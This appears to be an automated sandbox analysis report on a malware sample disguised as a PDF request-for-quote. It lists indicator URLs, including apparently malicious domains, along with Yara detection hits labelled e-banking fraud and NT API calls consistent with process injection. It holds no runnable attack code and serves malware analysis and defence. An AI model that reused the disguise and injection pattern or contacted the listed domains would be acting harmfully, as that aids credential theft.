                Source: msinfo32.exe, 0000001A.00000002.3732924393.0000000005F80000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.0000000003D60000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: msinfo32.exe, 0000001A.00000002.3734619371.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732924393.0000000006A7E000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000485E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.5.1.min.js
                Source: msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: msinfo32.exe, 0000001A.00000002.3734619371.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732924393.0000000006A7E000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000485E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gamesfunny.top$
                Source: msinfo32.exe, 0000001A.00000002.3718631099.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: msinfo32.exe, 0000001A.00000002.3718631099.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: msinfo32.exe, 0000001A.00000002.3718631099.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: msinfo32.exe, 0000001A.00000002.3718631099.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: msinfo32.exe, 0000001A.00000002.3718631099.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033V
                Source: msinfo32.exe, 0000001A.00000002.3718631099.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: msinfo32.exe, 0000001A.00000002.3718631099.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: msinfo32.exe, 0000001A.00000003.1657000305.0000000007D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: msinfo32.exe, 0000001A.00000002.3734619371.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732924393.0000000006A7E000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000485E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://playchill.top/api/axgames/request?domain=$
                Source: msinfo32.exe, 0000001A.00000002.3734619371.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732924393.0000000006A7E000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000485E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
                Source: msinfo32.exe, 0000001A.00000002.3732924393.000000000522C000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3731711084.00000000048AF000.00000004.00000020.00020000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.1770860245.0000000020BDC000.00000004.80000000.00040000.00000000.sdmp, NEW.RFQ00876.pdf.exe, RAangyFeHdZLco.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: msinfo32.exe, 0000001A.00000002.3732924393.0000000005938000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.0000000003718000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.mrpokrovskii.pro/7mvy/?tHfx=9byl&PHM8hj-=h6bUgYM5oQIom3SHXrnUV9
                Source: msinfo32.exe, 0000001A.00000002.3732924393.0000000005938000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.0000000003718000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.mrpokrovskii.pro/7mvy/?tHfx=9byl&amp;PHM8hj-=h6bUgYM5oQIom3SHXrnUV9
                Source: aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.00000000043A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCD4610 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0CCD4610

                E-Banking Fraud

                Source: Yara matchFile source: 15.2.NEW.RFQ00876.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.NEW.RFQ00876.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000001A.00000002.3732187753.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.3732135762.00000000049A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.3733834808.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1464634717.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1467457983.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.3718055960.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.3732033818.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sampleStatic PE information: Filename: NEW.RFQ00876.pdf.exe
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0042CA13 NtClose,15_2_0042CA13
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892B60 NtClose,LdrInitializeThunk,15_2_01892B60
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892DF0 NtQuerySystemInformation,LdrInitializeThunk,15_2_01892DF0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892C70 NtFreeVirtualMemory,LdrInitializeThunk,15_2_01892C70
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018935C0 NtCreateMutant,LdrInitializeThunk,15_2_018935C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01894340 NtSetContextThread,15_2_01894340
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01894650 NtSuspendThread,15_2_01894650
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892B80 NtQueryInformationFile,15_2_01892B80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892BA0 NtEnumerateValueKey,15_2_01892BA0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892BE0 NtQueryValueKey,15_2_01892BE0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892BF0 NtAllocateVirtualMemory,15_2_01892BF0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892AB0 NtWaitForSingleObject,15_2_01892AB0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892AD0 NtReadFile,15_2_01892AD0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892AF0 NtWriteFile,15_2_01892AF0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892DB0 NtEnumerateKey,15_2_01892DB0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892DD0 NtDelayExecution,15_2_01892DD0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892D00 NtSetInformationFile,15_2_01892D00
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892D10 NtMapViewOfSection,15_2_01892D10
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892D30 NtUnmapViewOfSection,15_2_01892D30
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892CA0 NtQueryInformationToken,15_2_01892CA0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892CC0 NtQueryVirtualMemory,15_2_01892CC0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892CF0 NtOpenProcess,15_2_01892CF0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892C00 NtQueryInformationProcess,15_2_01892C00
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892C60 NtCreateKey,15_2_01892C60
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892F90 NtProtectVirtualMemory,15_2_01892F90
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892FA0 NtQuerySection,15_2_01892FA0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892FB0 NtResumeThread,15_2_01892FB0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892FE0 NtCreateFile,15_2_01892FE0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892F30 NtCreateSection,15_2_01892F30
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892F60 NtCreateProcessEx,15_2_01892F60
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892E80 NtReadVirtualMemory,15_2_01892E80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892EA0 NtAdjustPrivilegesToken,15_2_01892EA0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892EE0 NtQueueApcThread,15_2_01892EE0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892E30 NtWriteVirtualMemory,15_2_01892E30
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01893090 NtSetValueKey,15_2_01893090
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01893010 NtOpenDirectoryObject,15_2_01893010
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018939B0 NtGetContextThread,15_2_018939B0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01893D10 NtOpenProcessToken,15_2_01893D10
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01893D70 NtOpenThread,15_2_01893D70
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_01B0DD140_2_01B0DD14
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_058B14800_2_058B1480
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_058B76C80_2_058B76C8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_058B00060_2_058B0006
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_058B00400_2_058B0040
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_058BF53F0_2_058BF53F
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_058BF5430_2_058BF543
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_058B76B80_2_058B76B8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0755B6A00_2_0755B6A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0755A2980_2_0755A298
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0755BF100_2_0755BF10
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07559E600_2_07559E60
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0755BAD80_2_0755BAD8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_079DEE280_2_079DEE28
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_079D6C800_2_079D6C80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE03C80_2_07CE03C8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE27330_2_07CE2733
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0C040D460_2_0C040D46
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0C04A6E80_2_0C04A6E8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0C0437100_2_0C043710
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0C0400400_2_0C040040
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0C04A6C10_2_0C04A6C1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCD14E80_2_0CCD14E8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCD8AB00_2_0CCD8AB0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCD00400_2_0CCD0040
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCD00060_2_0CCD0006
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_00418A1315_2_00418A13
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0042F06315_2_0042F063
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040301015_2_00403010
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040112015_2_00401120
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040127015_2_00401270
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0041027315_2_00410273
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040236415_2_00402364
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040236C15_2_0040236C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040237015_2_00402370
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_00416C1315_2_00416C13
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040E48315_2_0040E483
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0041049315_2_00410493
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040E5C715_2_0040E5C7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040E5D315_2_0040E5D3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040E6A615_2_0040E6A6
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_019201AA15_2_019201AA
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_019181CC15_2_019181CC
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185010015_2_01850100
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018FA11815_2_018FA118
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E815815_2_018E8158
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F200015_2_018F2000
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_019203E615_2_019203E6
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186E3F015_2_0186E3F0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191A35215_2_0191A352
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E02C015_2_018E02C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0190027415_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0192059115_2_01920591
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186053515_2_01860535
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0190E4F615_2_0190E4F6
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191244615_2_01912446
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185C7C015_2_0185C7C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188475015_2_01884750
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186077015_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187C6E015_2_0187C6E0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018629A015_2_018629A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0192A9A615_2_0192A9A6
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187696215_2_01876962
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018468B815_2_018468B8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E8F015_2_0188E8F0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186284015_2_01862840
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186A84015_2_0186A840
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01916BD715_2_01916BD7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191AB4015_2_0191AB40
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185EA8015_2_0185EA80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01878DBF15_2_01878DBF
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185ADE015_2_0185ADE0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186AD0015_2_0186AD00
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900CB515_2_01900CB5
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01850CF215_2_01850CF2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860C0015_2_01860C00
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018DEFA015_2_018DEFA0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01852FC815_2_01852FC8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186CFE015_2_0186CFE0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018A2F2815_2_018A2F28
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01880F3015_2_01880F30
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D4F4015_2_018D4F40
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191CE9315_2_0191CE93
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01872E9015_2_01872E90
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191EEDB15_2_0191EEDB
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191EE2615_2_0191EE26
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860E5915_2_01860E59
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186B1B015_2_0186B1B0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0189516C15_2_0189516C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184F17215_2_0184F172
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0192B16B15_2_0192B16B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018670C015_2_018670C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0190F0CC15_2_0190F0CC
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191F0E015_2_0191F0E0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_019170E915_2_019170E9
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018A739A15_2_018A739A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191132D15_2_0191132D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184D34C15_2_0184D34C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018652A015_2_018652A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187B2C015_2_0187B2C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_019012ED15_2_019012ED
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018FD5B015_2_018FD5B0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191757115_2_01917571
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191F43F15_2_0191F43F
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185146015_2_01851460
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191F7B015_2_0191F7B0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_019116CC15_2_019116CC
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F591015_2_018F5910
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186995015_2_01869950
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187B95015_2_0187B950
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018638E015_2_018638E0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CD80015_2_018CD800
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187FB8015_2_0187FB80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0189DBF915_2_0189DBF9
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D5BF015_2_018D5BF0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191FB7615_2_0191FB76
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018FDAAC15_2_018FDAAC
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018A5AA015_2_018A5AA0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0190DAC615_2_0190DAC6
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01917A4615_2_01917A46
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191FA4915_2_0191FA49
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D3A6C15_2_018D3A6C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187FDC015_2_0187FDC0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01863D4015_2_01863D40
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01911D5A15_2_01911D5A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01917D7315_2_01917D73
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191FCF215_2_0191FCF2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D9C3215_2_018D9C32
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01861F9215_2_01861F92
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191FFB115_2_0191FFB1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191FF0915_2_0191FF09
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01869EB015_2_01869EB0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 20_2_00B6DD1420_2_00B6DD14
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 20_2_0524272820_2_05242728
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 20_2_052403C820_2_052403C8
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 20_2_06C1B6A020_2_06C1B6A0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 20_2_06C1A29820_2_06C1A298
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 20_2_06C19E6020_2_06C19E60
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 20_2_06C1BF1020_2_06C1BF10
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 20_2_06C1BAD820_2_06C1BAD8
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 20_2_0B41035A20_2_0B41035A
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0103010023_2_01030100
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0108600023_2_01086000
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010C02C023_2_010C02C0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104053523_2_01040535
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0106475023_2_01064750
